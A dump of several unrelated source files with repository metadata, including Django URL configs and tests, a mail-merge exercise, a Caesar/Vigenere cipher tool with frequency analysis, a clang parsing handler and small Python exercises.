time=item.date[0],
amount=self.Account.sell_available.get(
item.code[0], 0),
towards=QA.ORDER_DIRECTION.SELL,
price=0,
order_model=QA.ORDER_MODEL.MARKET,
amount_model=QA.AMOUNT_MODEL.BY_AMOUNT
)
if order:
self.Broker.receive_order(QA.QA_Event(order=order, market_data=item))
trade_mes = self.Broker.query_orders(self.Account.account_cookie, 'filled')
res = trade_mes.loc[order.account_cookie, order.realorder_id]
order.trade(res.trade_id, res.trade_price,
res.trade_amount, res.trade_time)
self.Account.settle()
| [
"415496929@qq.com"
] | 415496929@qq.com |
3f31872d57224f64ff578a03c5a4ab5fa57cc9d0 | 9ddf19081a975a073dfbe478d448bcd2c948de51 | /Day 24 - Automatic Invitations/main.py | fa0b2706c0cfb7b1e622aa6d5f206b13dfe00d0f | [] | no_license | Drust2/100Days | 219f35d94f98abda3008350fbc2b458e953c94b6 | b456c5b0fde054105a9ce3904c1bb16699cd9c59 | refs/heads/main | 2023-05-10T23:15:04.116802 | 2021-06-03T18:58:16 | 2021-06-03T18:58:16 | 322,945,319 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,042 | py | #TODO: Create a letter using starting_letter.docx
#for each name in invited_names.txt
#Replace the [name] placeholder with the actual name.
#Save the letters in the folder "ReadyToSend".
#Hint1: This method will help you: https://www.w3schools.com/python/ref_file_readlines.asp
#Hint2: This method will also help you: https://www.w3schools.com/python/ref_string_replace.asp
#Hint3: THis method will help you: https://www.w3schools.com/python/ref_string_strip.asp
with open(r".\input\letters\starting_letter.docx", "r") as template_letter:
template = template_letter.readlines()
with open(r".\Input\Names\invited_names.txt", "r") as filen:
names = filen.readlines()
to_replace = "[name],"
for i in names:
current_name = i.strip()
letter = template
letter[0] = letter[0].replace(to_replace, current_name + ",")
title = f"Letter_for_{current_name}"
to_replace = current_name + ","
with open(f".\output\ReadyToSend\{title}.txt", "a") as file:
for i in letter:
file.write(i) | [
"noreply@github.com"
] | noreply@github.com |
b113b1db3bfe5f8e92de554cc4f803a2b126bac7 | 902e8b6f2c39c0a7baa8abd9637aa43f4be27e27 | /Code/Chapter 1/src/blueblog/urls.py | 9e80e946967b3d343885c7d48be82d6ec68c8c7b | [] | no_license | PacktPublishing/Django-Projects-Blueprints | 8151e611ae5cf95dc985ac7d08ce503bd41e0c4a | 7d2409ea1b43b057d1e4c337e348cb6e102f75d6 | refs/heads/master | 2023-02-08T13:34:22.658965 | 2023-01-30T10:17:40 | 2023-01-30T10:17:40 | 59,006,898 | 32 | 30 | null | null | null | null | UTF-8 | Python | false | false | 1,744 | py | from django.conf.urls import include
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth.views import login
from django.contrib.auth.views import logout
from accounts.views import UserRegistrationView
from blog.views import NewBlogView
from blog.views import HomeView
from blog.views import UpdateBlogView
from blog.views import NewBlogPostView
from blog.views import UpdateBlogPostView
from blog.views import BlogPostDetailsView
from blog.views import SharePostWithBlog
from blog.views import StopSharingPostWithBlog
from blog.views import ShareBlogPostView
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^$', HomeView.as_view(), name='home'),
url(r'^new-user/$', UserRegistrationView.as_view(), name='user_registration'),
url(r'^login/$', login, {'template_name': 'login.html'}, name='login'),
url(r'^logout/$', logout, {'next_page': '/login/'}, name='logout'),
url(r'^blog/new/$', NewBlogView.as_view(), name='new-blog'),
url(r'^blog/(?P<pk>\d+)/update/$', UpdateBlogView.as_view(), name='update-blog'),
url(r'blog/post/new/$', NewBlogPostView.as_view(), name='new-blog-post'),
url(r'blog/post/(?P<pk>\d+)/update/$', UpdateBlogPostView.as_view(), name='update-blog-post'),
url(r'blog/post/(?P<pk>\d+)/$', BlogPostDetailsView.as_view(), name='blog-post-details'),
url(r'blog/post/(?P<pk>\d+)/share/$', ShareBlogPostView.as_view(), name='share-blog-post-with-blog'),
url(r'blog/post/(?P<post_pk>\d+)/share/to/(?P<blog_pk>\d+)/$', SharePostWithBlog.as_view(), name='share-post-with-blog'),
url(r'blog/post/(?P<post_pk>\d+)/stop/share/to/(?P<blog_pk>\d+)/$', StopSharingPostWithBlog.as_view(), name='stop-sharing-post-with-blog'),
]
| [
"packt.danishs@gmail.com"
] | packt.danishs@gmail.com |
34b237ae8be56b9d1a13f968ccdbf955e4b68ab9 | 27d90c168a4cc7bc65d3f3658d1483aa9b852f5c | /HostingEcom/urls.py | 5609c9ae2a2832610fa567f219cf29d8408d606c | [] | no_license | ICTServ/HostingEcom | df46acb861e784054f3d2114ee169b16eb91e52d | 59cc5ce4cee51f532b8071b87663b9f31349b0eb | refs/heads/master | 2023-03-26T19:19:35.705713 | 2021-03-25T18:53:53 | 2021-03-25T18:53:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,073 | py | """HostingEcom URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('', include('shop.urls')),
path('users/', include('users.urls')),
path('server/', include('server.urls'))
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"sbsarnava@gmail.com"
] | sbsarnava@gmail.com |
919f24c4fea2046bddb1761436745440bb6a53b0 | ad921025e128bb55fa84d84f79af2a8ff93adfa7 | /encryptor.py | 39996603084e477d1b96256c17e9b40aa144460d | [] | no_license | AlexeySafin924/Encryption-machine | 3f6c22594d746e02815221c84d0bd855d2f16a4b | fba2569bf541692fa78bf0b6b7440da08a9e378a | refs/heads/main | 2023-07-26T08:38:13.641317 | 2021-09-06T13:33:01 | 2021-09-06T13:33:01 | 403,263,710 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,117 | py | import argparse
import sys
import string
from collections import defaultdict
low_from = dict()
low_to = dict()
big_from = dict()
big_to = dict()
for i in range(0, len(string.ascii_lowercase)):
low_from[i] = string.ascii_lowercase[i]
low_to[string.ascii_lowercase[i]] = i
big_from[i] = string.ascii_uppercase[i]
big_to[string.ascii_uppercase[i]] = i
def is_low(symbol):
return symbol in low_to
def is_big(symbol):
return symbol in big_to
def change(shift, i):
if is_low(i):
to = low_to
frm = low_from
elif is_big(i):
to = big_to
frm = big_from
else:
return i
return frm[(to[i] + shift + len(frm)) % len(frm)]
def caesar(input_string, shift, sign):
result = ""
shift = int(shift)
for i in input_string:
result += change(shift * sign, i)
return result
def vigenere(input_string, word, code): # code = 1 means encrypt, -1 - decrypt
result = ""
j = 0
for i in input_string:
result += change(big_to[word[j]] * code, i)
if is_low(i) or is_big(i):
j = (j + 1) % (len(word))
return result
def make_hist(input_string):
hist = defaultdict(float)
total_numbers = 0
for i in input_string:
if is_big(i) or is_low(i):
hist[i.upper()] += 1
total_numbers += 1
for i in big_to:
hist[i] /= total_numbers
return hist
def train_caesar(input_string):
return make_hist(input_string)
def parse(model):
t = list(map(str, model[1:-1].split(',')))
d = dict()
for i in t:
k = list(map(str, i.split()))
d[k[0][1]] = float(k[-1])
return d
def hack_caesar(input_string, model):
norm = parse(model)
hist = make_hist(input_string)
min_dev = float('inf')
shift = None
for y in range(len(big_from)):
deviation = 0
for i in hist:
deviation += (hist[big_from[(big_to[i] + y) % len(big_from)]] - norm[i]) ** 2
if deviation < min_dev:
min_dev = deviation
shift = y
return caesar(input_string, shift, -1)
def read(args, str):
if str == "text":
if args.text_file:
input_str = args.text_file.read()
else:
input_str = sys.stdin.read()
return input_str
if args.input_file:
input_str = args.input_file.read()
else:
input_str = sys.stdin.read()
return input_str
def write(args, result):
if args.output_file:
args.output_file.write(result)
else:
sys.stdout.write(result)
def encrypt(args):
input_str = read(args, "input")
if args.cipher == 'caesar':
result = caesar(input_str, args.key, 1)
else:
result = vigenere(input_str, args.key, 1)
write(args, result)
def decrypt(args):
input_str = read(args, "input")
if args.cipher == 'caesar':
result = caesar(input_str, args.key, -1)
else:
result = vigenere(input_str, args.key, -1)
write(args, result)
def train(args):
input_str = read(args, "text")
result = train_caesar(input_str)
args.model_file.write(str(dict(result)))
def hack(args):
input_str = read(args, "input")
result = hack_caesar(input_str, args.model_file.read())
write(args, result)
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
encode_parser = subparsers.add_parser('encode', help='Help for encode')
encode_parser.set_defaults(solve=encrypt)
encode_parser.add_argument('--cipher', choices=['caesar', 'vigenere'], help='Type of cipher', required=True)
encode_parser.add_argument('--key', help='Cipher key', required=True)
encode_parser.add_argument('--input-file', type=argparse.FileType('r'), help='File for input')
encode_parser.add_argument('--output-file', type=argparse.FileType('w'), help='File for output')
decode_parser = subparsers.add_parser('decode', help='Help for decode')
decode_parser.set_defaults(solve=decrypt)
decode_parser.add_argument('--cipher', choices=['caesar', 'vigenere'], help='Type of cipher', required=True)
decode_parser.add_argument('--key', help='Cipher key', required=True)
decode_parser.add_argument('--input-file', type=argparse.FileType('r'), help='File for input')
decode_parser.add_argument('--output-file', type=argparse.FileType('w'), help='File for output')
train_parser = subparsers.add_parser('train', help='Help for train')
train_parser.set_defaults(solve=train)
train_parser.add_argument('--text-file', type=argparse.FileType('r'), help='File for input')
train_parser.add_argument('--model-file', type=argparse.FileType('w'), help='File for model', required=True)
hack_parser = subparsers.add_parser('hack', help='Help for hack')
hack_parser.set_defaults(solve=hack)
hack_parser.add_argument('--input-file', type=argparse.FileType('r'), help='File for input')
hack_parser.add_argument('--output-file', type=argparse.FileType('w'), help='File for output')
hack_parser.add_argument('--model-file', type=argparse.FileType('r'), help='File for model', required=True)
arguments = parser.parse_args()
arguments.solve(arguments)
| [
"safin.am@phystech.edu"
] | safin.am@phystech.edu |
e306046dfee373ba4e6be57818d704c98ff202fd | b716cf76b0e398f3666d8544ccfab47282520e08 | /main.py | a8d06c9a8d9e65b23207bccf5ba49c2bd46c64dc | [] | no_license | edgarlunaa/formato_txt_pandas | dc19e4ee8c69af2632709242e037553b3d7b9481 | cdcd5c1ea42049db812166faf54141110a003277 | refs/heads/main | 2023-03-22T17:51:43.548181 | 2021-03-18T16:21:30 | 2021-03-18T16:21:30 | 333,510,843 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,617 | py | from openpyxl import load_workbook
import pandas as pd
codigo_empresa = '5533'
def dar_formato(txt, total, tipo):
if len(txt) + 1 <= total:
resto = total - len(txt)
if tipo == 'A':
txt = txt + ' ' * resto
elif tipo == 'N':
txt = '0' * resto + txt
if len(txt) > total:
txt = txt[:total]
return txt
wb = load_workbook("formato.xlsx")
ws_formato = wb.active
index = 1
columnas = []
for row in ws_formato:
try:
if int(row[2].value) > 0:
tupla_columnas = (index, row[1].value, int(row[2].value), row[0].value)
columnas.append(tupla_columnas)
index = index + 1
except:
pass
col_list = ['MONTO', 'localidad', 'COD_SUCURSAL', 'NOMBRE_SUCURSAL', 'NOMBRES', 'APELLIDOS', 'CUIT', 'FECHA_DESDE', 'FECHA_HASTA', 'NRO_DOCUMENTO', 'DATOS BANCO']
df_cuotas = pd.read_excel(codigo_empresa+'.xlsx', usecols=col_list)
print(list(df_cuotas.columns))
try:
df_cuotas['COD_SUCURSAL'] = df_cuotas['COD_SUCURSAL'].astype(str).str.slice(0, -2, 1)
df_cuotas['CUIT'] = df_cuotas['CUIT'].astype(str).astype(str).str.slice(0, -2, 1)
except:
pass
print(df_cuotas['FECHA_HASTA'])
print(df_cuotas)
df_cuotas.to_excel(codigo_empresa+" formateado.xlsx", index=False)
print(df_cuotas)
calc_monto_gral = df_cuotas['MONTO'].sum()
monto_gral = dar_formato(str(calc_monto_gral), 10, 'N')
monto_gral = monto_gral + '00'
cantidad_registros = dar_formato(str(df_cuotas.shape[0]), 8, 'N')
txt = "00032021"+cantidad_registros+monto_gral+"000000000000000000002203202105042021020"+ codigo_empresa + dar_formato("", 953, 'A')
for index, row in df_cuotas.iterrows():
txt += "\n"
txt += "00"
#GRUPO DE PAGO FECHA DESDE FECHA HASTA
txt += dar_formato(str(row['FECHA_DESDE']), 8, 'N') + dar_formato(str(row['FECHA_HASTA']), 8, 'N')
cuit = str(row['CUIT'])
txt += dar_formato(cuit, 11, 'N')
#EXCAJA TIPO BENEFICIARIO
txt += "000"
txt += dar_formato(str(row['NRO_DOCUMENTO']), 8, 'N')
#BCO: FIJO= 020 SUCURSAL
txt += "0020" + dar_formato(str(row['COD_SUCURSAL']), 3, 'N')
apellido_nombre = str(row['APELLIDOS']) + " " + str(row['NOMBRES'])
apellido_nombre = apellido_nombre.title().upper()
txt += dar_formato(apellido_nombre, 27, 'A')
#TIPO DE DOC: DNI=1
txt += "1"
txt += dar_formato(str(row['NRO_DOCUMENTO']), 8, 'N')
#PCIA EMISIÓN: CBA=04 CUIL APODERADO
txt += "0400000000000"
#APELLIDO Y NOMBRE DE APODERADO
txt += dar_formato("", 27, 'A')
#TIPO DOC. APODERADO NRO DOC APODERADO PCIA EMISIÓN: CBA=04 CÓDIGO CONCEPTO 1: FIJO 001 SUBCÓDIGO DEL CONCEPTO 1: FIJO 000 IMPORTE DEL CONCEPTO 1
txt += "00000000004001000000" + str(row['MONTO']) + '00'
#columna desde la 23 a la 97
sum = 0
for i in range(23,98):
sum += columnas[i][2]
sum += 2
txt += dar_formato("", sum, 'N')
#IMPORTE MAYOR A $ 9.999,00.-: 0=NO ; 1=SI PERIODO LIQUIDACIÓN: MMAA TIPO DE PAGO: VER ANEXO FORMA DE PAGO: VENTANILLA= 0 TIPO DE CUENTA: VALOR FIJO 0
txt += "101210000"
#NRO CUENTA VALOR FIJO 0 FECHA DESDE PROX PAGO: DDMMAAA FECHA HASTA PROX PAGO: DDMMAAAA
txt += dar_formato("", 36, 'N')
#LEYENDA 1 LEYENDA 2 LEYENDA 3 LEYENDA 4
if codigo_empresa == '5533':
ministerio = 'MINISTERIO DE PROMOCION DEL EMPLEO Y E'
elif codigo_empresa == '5541':
ministerio = 'MINISTERIO DE DESARROLLO SOCIAL '
programa = 'PROGRAMA VIDA DIGNA '
txt += "GOBIERNO DE LA PROVINCIA DE CORDOBA "+ministerio+programa+"APODERADO DE "
#LEYENDA 5
txt += dar_formato(apellido_nombre, 38, 'A')
#LEYENDA 6 LEYENDA 7 LEYENDA 8
txt += dar_formato("", 114, 'A')
#CÓDIGO PAGO-IMPAGO: LA EMPRESA DEBE PONER SIEMPRE 1= IMPAGO. ELBANCO EN LA RENDICIÓN DEVUELVE 0=PAGO O 1=IMPAGO FECHA PAGO:COMPLETA EL BANCO LA EMPRESA DEBE PONER 0 PAGO CON TARJETA VALOR FIJO = 0 MOTIVO IMPAGO VALOR FIJO PARA LA EMPRESA=0- LUEGO COMPLETA EL BANCO - VER ANEXOS NÚMERO DE COMPROBANTE: COMPLETA EL BANCO ÚLTIMO MOV CUENTA: COMPLETA EL BANCO RETENCIÓN DE TARJETA: 0=PAGO NORMAL; 1=TARJ.RETENIDA CAJERO COMISIÓN: VALOR FIJO= ESPACIO UR ASIGNADA: VALOR FIJO=000 IMPORTE MORATORIA AFIP: VALOR FIJO=0000000000 IMP. RETROACTIVO MOR. AFIP: VALOR FIJO=0000000000 IMPORTE NETO A COBRAR CÓDIGO DE EMPRESA
txt += "100000000000000000000000000 0000000000000000000000000000" + str(row['MONTO']) + '00' + codigo_empresa
#USO FUTURO: VALOR FIJO= ESPACIOS
txt += dar_formato("", 38, 'A')
f = open(codigo_empresa+".txt", "w")
f.write(txt)
f.close() | [
"edgaribarluna@gmail.com"
] | edgaribarluna@gmail.com |
bf2bd04d55b63d25a15b6344be797b303d828510 | 30e38ab7901cb20f7d80c961bbb0728fde4b02ae | /untitled0.py | 7ccff0567ed091c4150aebf6f470c6e11ef7cb49 | [] | no_license | Jmro2120/ClaseFundamentosDePogama | 1100ba1784883ef22c91ecbc39f737c46b39a799 | c03478ef5d60c0d86ad37e20d8df535311076ccb | refs/heads/main | 2023-03-06T20:26:19.548511 | 2021-02-19T02:01:01 | 2021-02-19T02:01:01 | 340,231,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 11 19:04:20 2021
@author: Liliana
"""
var_edad=int(input("ingrese su edad:"));
print("su edad es :",var_edad) | [
"78770549+Jmro2120@users.noreply.github.com"
] | 78770549+Jmro2120@users.noreply.github.com |
4b6c86cc1fcd9c0e3583792882c23f4208225094 | 48c6a6adc85b002e85771bdf1fc82a5159a1124d | /ctypeslib/codegen/handler.py | 57bb9f28449f73f74e7d479538f7ddee25f04c78 | [
"MIT"
] | permissive | pombreda/ctypeslib | 8afa8d8a3a01c48949f96173ce41b4a6aa94bad1 | c8f645991ba694c1fc43c1ba09643f201b01d3e4 | refs/heads/master | 2021-01-17T05:38:59.423578 | 2015-02-02T05:49:25 | 2015-02-02T05:49:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,461 | py | """Abstract Handler with helper methods."""
from clang.cindex import CursorKind, TypeKind
from ctypeslib.codegen import typedesc
from ctypeslib.codegen.util import log_entity
import logging
log = logging.getLogger('handler')
## DEBUG
import code
class CursorKindException(TypeError):
"""When a child node of a VAR_DECL is parsed as an initialization value,
when its not actually part of that initiwlization value."""
pass
class InvalidDefinitionError(TypeError):
"""When a structure is invalid in the source code, sizeof, alignof returns
negatives value. We detect it and do our best."""
pass
class DuplicateDefinitionException(KeyError):
"""When we encounter a duplicate declaration/definition name."""
pass
################################################################
class ClangHandler(object):
"""
Abstract class for handlers.
"""
def __init__(self, parser):
self.parser = parser
self._unhandled = []
def register(self, name, obj):
return self.parser.register(name, obj)
def get_registered(self, name):
return self.parser.get_registered(name)
def is_registered(self, name):
return self.parser.is_registered(name)
def remove_registered(self, name):
return self.parser.remove_registered(name)
def set_location(self, obj, cursor):
""" Location is also used for codegeneration ordering."""
if ( hasattr(cursor, 'location') and cursor.location is not None
and cursor.location.file is not None):
obj.location = (cursor.location.file.name, cursor.location.line)
return
def set_comment(self, obj, cursor):
""" If a comment is available, add it to the typedesc."""
if isinstance(obj, typedesc.T):
obj.comment = cursor.brief_comment
return
def make_python_name(self, name):
"""Transforms an USR into a valid python name."""
# FIXME see cindex.SpellingCache
for k, v in [('<','_'), ('>','_'), ('::','__'), (',',''), (' ',''),
("$", "DOLLAR"), (".", "DOT"), ("@", "_"), (":", "_")]:
if k in name: # template
name = name.replace(k,v)
#FIXME: test case ? I want this func to be neutral on C valid names.
if name.startswith("__"):
return "_X" + name
if len(name) == 0:
raise ValueError
elif name[0] in "01234567879":
return "_" + name
return name
def get_unique_name(self, cursor):
name = ''
if hasattr(cursor, 'displayname'):
name = cursor.displayname
elif hasattr(cursor, 'spelling'):
name = cursor.spelling
if name == '' and hasattr(cursor,'get_usr'): #FIXME: should not get Type
_id = cursor.get_usr()
if _id == '': # anonymous is spelling == ''
return None
name = self.make_python_name( _id )
if cursor.kind == CursorKind.STRUCT_DECL:
name = 'struct_%s'%(name)
elif cursor.kind == CursorKind.UNION_DECL:
name = 'union_%s'%(name)
elif cursor.kind == CursorKind.CLASS_DECL:
name = 'class_%s'%(name)
elif cursor.kind == CursorKind.TYPE_REF:
name = name.replace(' ', '_')
return name
def is_fundamental_type(self, t):
return (not self.is_pointer_type(t) and
t.kind in self.parser.ctypes_typename.keys())
def is_pointer_type(self, t):
return t.kind == TypeKind.POINTER
def is_array_type(self, t):
return (t.kind == TypeKind.CONSTANTARRAY or
t.kind == TypeKind.INCOMPLETEARRAY or
t.kind == TypeKind.VARIABLEARRAY or
t.kind == TypeKind.DEPENDENTSIZEDARRAY )
def is_unexposed_type(self, t):
return t.kind == TypeKind.UNEXPOSED
def is_literal_cursor(self, t):
return ( t.kind == CursorKind.INTEGER_LITERAL or
t.kind == CursorKind.FLOATING_LITERAL or
t.kind == CursorKind.IMAGINARY_LITERAL or
t.kind == CursorKind.STRING_LITERAL or
t.kind == CursorKind.CHARACTER_LITERAL)
def get_literal_kind_affinity(self, literal_kind):
''' return the list of fundamental types that are adequate for which
this literal_kind is adequate'''
if literal_kind == CursorKind.INTEGER_LITERAL:
return [TypeKind.USHORT, TypeKind.UINT, TypeKind.ULONG,
TypeKind.ULONGLONG, TypeKind.UINT128,
TypeKind.SHORT, TypeKind.INT, TypeKind.LONG,
TypeKind.LONGLONG, TypeKind.INT128, ]
elif literal_kind == CursorKind.STRING_LITERAL:
return [TypeKind.CHAR16, TypeKind.CHAR32, TypeKind.CHAR_S,
TypeKind.SCHAR, TypeKind.WCHAR ] ## DEBUG
elif literal_kind == CursorKind.CHARACTER_LITERAL:
return [TypeKind.CHAR_U, TypeKind.UCHAR]
elif literal_kind == CursorKind.FLOATING_LITERAL:
return [TypeKind.FLOAT, TypeKind.DOUBLE, TypeKind.LONGDOUBLE]
elif literal_kind == CursorKind.IMAGINARY_LITERAL:
return []
return []
def get_ctypes_name(self, typekind):
return self.parser.get_ctypes_name(typekind)
def get_ctypes_size(self, typekind):
return self.parser.get_ctypes_size(typekind)
def parse_cursor(self, cursor):
return self.parser.parse_cursor(cursor)
def parse_cursor_type(self, _cursor_type):
return self.parser.parse_cursor_type(_cursor_type)
################################
# do-nothing element handlers
@log_entity
def _pass_through_children(self, node, **args):
for child in node.get_children():
self.parser.startElement( child )
return True
def _do_nothing(self, node, **args):
name = self.get_unique_name(node)
#import code
#code.interact(local=locals())
log.warning('_do_nothing for %s/%s'%(node.kind.name, name))
return True
###########################################
# TODO FIXME: 100% cursor/type Kind coverage
def __getattr__(self, name, **args):
if name not in self._unhandled:
log.warning('%s is not handled'%(name))
self._unhandled.append(name)
return self._do_nothing
| [
"loic.jaquemet+github@gmail.com"
] | loic.jaquemet+github@gmail.com |
f02dd9c32a0ef2a43dbd358dd6e79f6319d7e58a | d6a1269f0d1cc264b974cd462b1ff985eff9b303 | /apiV2/tests/test_registration.py | f33db91ee9f76aa001f874db51be8d8a3b79c824 | [
"MIT"
] | permissive | DerKip/Ride-My-Way | 284b62485ca51b88b5e7b6e99e4b759f8f476823 | 30600349b4225272c4b6e78851c1dce96e586d31 | refs/heads/develop | 2022-12-08T21:42:49.298123 | 2018-08-01T07:57:49 | 2018-08-01T07:57:49 | 136,759,664 | 4 | 1 | MIT | 2022-12-08T00:58:59 | 2018-06-09T21:32:37 | Python | UTF-8 | Python | false | false | 5,654 | py | from ..tests.base_test import BaseTestCase
from ..models.models import db, initialize, drop
import json
class RegistrationTestCase(BaseTestCase):
""" This class represents resgistration test case """
def setUp(self):
super().setUp()
db.__init__()
drop()
initialize()
self.data = {
"user":{
"username":"Errick",
"email":"dkip64@gmail.com",
"contact":"0721611441",
"password":"TakeMethere1!",
"confirm_password":"TakeMethere1!"
},
"user1":{
"username":"Emannuel",
"email":"dkip64@gmail.com",
"contact":"0778161441",
"password":"Van#dgert3",
"confirm_password":"Van#dgert3"
},
"spaces":{
"username":" ",
"email":"dkip64@gmail.com",
"contact":" ",
"password":"TakeMethere1!",
"confirm_password":"TakeMethere1!"
},
"user2":{
"username":"",
"email":"",
"password":"#derkIp",
"confirm_password":"#derkIp"
},
"mismatch":{
"username":"Jon",
"email":"Doe",
"password":"#derkIp",
"confirm_password":"#dkIp"
},
"weak":{
"username":"Jon",
"email":"Doe",
"password":"jon",
"confirm_password":"jon"
},
"invalid_email":{
"username":"Angelina",
"email":"Angelinagmail.scom",
"password":"angelina",
"confirm_password":"angelina"
}
}
def tearDown(self):
drop()
def test_user_can_register(self):
"""test whether user can register"""
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
content_type='application/json')
self.assertEqual(res.status_code,201)
def test_user_cannot_register_twice(self):
"""test whether user cannot register twice"""
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
content_type='application/json')
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
content_type='application/json') #checks if user can't register with existing user details
self.assertEqual(res.status_code,409)
def test_user_cannot_register_with_empty_spaces(self):
"""test whether user a user cannot register with empty spaces in fields"""
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["spaces"]),
content_type='application/json')
self.assertEqual(res.status_code,400)
def test_user_cannot_register_with_missing_fields(self):
"""test whether user a user cannot register with missing fields"""
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user2"]),
content_type='application/json')
self.assertEqual(res.status_code,400) #bad request
def test_weak_password(self):
"""test whether a user cannot register with a weak password"""
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["weak"]),
content_type='application/json')
self.assertEqual(res.status_code,400)
def test_email(self):
"""test whether a user email is valid"""
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["invalid_email"]),
content_type='application/json')
self.assertEqual(res.status_code,400)
def test_password_mismatch(self):
"""test whether confirm password matches with given password """
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["mismatch"]),
content_type='application/json')
self.assertEqual(res.status_code,400)
def test_user_can_register_without_filling_car_details(self):
"""test whether user a user can register without filling car details which isn't neccessary"""
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
content_type='application/json')
self.assertEqual(res.status_code,201)
def test_user_cannot_register_with_existing_email(self):
"""test whether user a user cannot register with email already in use"""
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
content_type='application/json')
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user1"]),
content_type='application/json')
self.assertEqual(res.status_code,409)
def test_user_cannot_register_with_existing_username(self):
"""test whether user a user cannot register with username already in use"""
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
content_type='application/json')
res=self.client().post(self.full_url('auth/signup'), data=json.dumps(self.data["user"]),
content_type='application/json')
self.assertEqual(res.status_code,409)
| [
"dkip64@gmail.com"
] | dkip64@gmail.com |
d80dd720858dc042a2f195293139c38d8a080e38 | 50de54517ef5e157b43598e412c477fd66890a3e | /Assignment 05/Problem 04.py | b0883029d93e9bfb1ca023132749cea0e5ea3943 | [] | no_license | Shihabsarker93/BRACU-CSE111 | f530be247bebaaee9cc5e85948dc070adae0c6ae | 17c95c76f84abffe9d9bdcb5861fbacbc510b5a6 | refs/heads/main | 2023-08-13T15:33:57.331850 | 2021-10-07T10:56:09 | 2021-10-07T10:56:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | class Color:
def __init__(self, color):
self.clr = color
def __add__(self, other):
self.clr = self.clr + other.clr
if self.clr == "redyellow" or self.clr == "yellowred":
self.clr = "Orange"
elif self.clr == "redblue" or self.clr == "bluered":
self.clr = "Violet"
elif self.clr == "yellowblue" or self.clr == "blueyellow":
self.clr = "Green"
return Color(self.clr)
C1 = Color(input("First Color: ").lower())
C2 = Color(input("Second Color: ").lower())
C3 = C1 + C2
print("Color formed:", C3.clr)
| [
"mirzamahrabhossain@gmail.com"
] | mirzamahrabhossain@gmail.com |
922632bd7fd107d2f4b5713afca0a914316f2f55 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/59/usersdata/195/48791/submittedfiles/testes.py | 697187f7d52f0e988ed1e5a2cdacc5e64b225503 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | # -*- coding: utf-8 -*-
a=int(input('digite a:'))
b=int(input('digite b:'))
c=int(input('digite c:'))
d=int(input('digite d:'))
if a>b and a>c and a>d:
print(a)
if b>a and b>c and b>d:
print(b)
if c>a and c>b and c>d:
print(c)
if d>a and d>b and d>c:
print(d)
if a<b and a<c and a<d:
print(a)
if b<a and b<c and b<d:
print(b)
if c<a and c<b and c<d:
print(c)
if d<a and d<b and d<c:
print(d) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
fa883276bba7a3b272be39a5bccc3a913013632e | 41a4a42fa875939d1d80195bb3fcdb167520a2ae | /company/test_forms.py | f665134d9ceed1c260a0e405543c75134e032644 | [] | no_license | hfolcot/issue-tracker | f05de6919835cb38abe83095933652bcce6cfac1 | 14f25b5346f0a9d28010d6f23b44f0e26666ed58 | refs/heads/master | 2022-12-26T03:16:21.607129 | 2021-05-27T13:38:48 | 2021-05-27T13:38:48 | 167,358,769 | 0 | 1 | null | 2022-12-08T03:12:32 | 2019-01-24T11:46:00 | Python | UTF-8 | Python | false | false | 895 | py | from django.test import TestCase
from . import forms
class TestContactForm(TestCase):
def test_form_is_not_valid_without_all_fields_entered(self):
form = forms.ContactForm({'your_name':'','email':'',
'message' : ''})
self.assertTrue(form.errors['your_name'], [u'This field is required.'])
self.assertTrue(form.errors['email'], [u'This field is required.'])
self.assertTrue(form.errors['message'], [u'This field is required.'])
def test_email_field_is_validated(self):
form = forms.ContactForm({'your_name':'test','email':'notanemail',
'message' : 'test'})
self.assertTrue(form.errors['email'], [u'Please include an \'@\' in the email address. \'notanemail\' is missing an \'@\'.'])
def test_form_is_valid_with_all_fields_entered(self):
form = forms.ContactForm({'your_name':'test','email':'test@test.test',
'message' : 'test'})
self.assertTrue(form.is_valid()) | [
"hfolcot@gmail.com"
] | hfolcot@gmail.com |
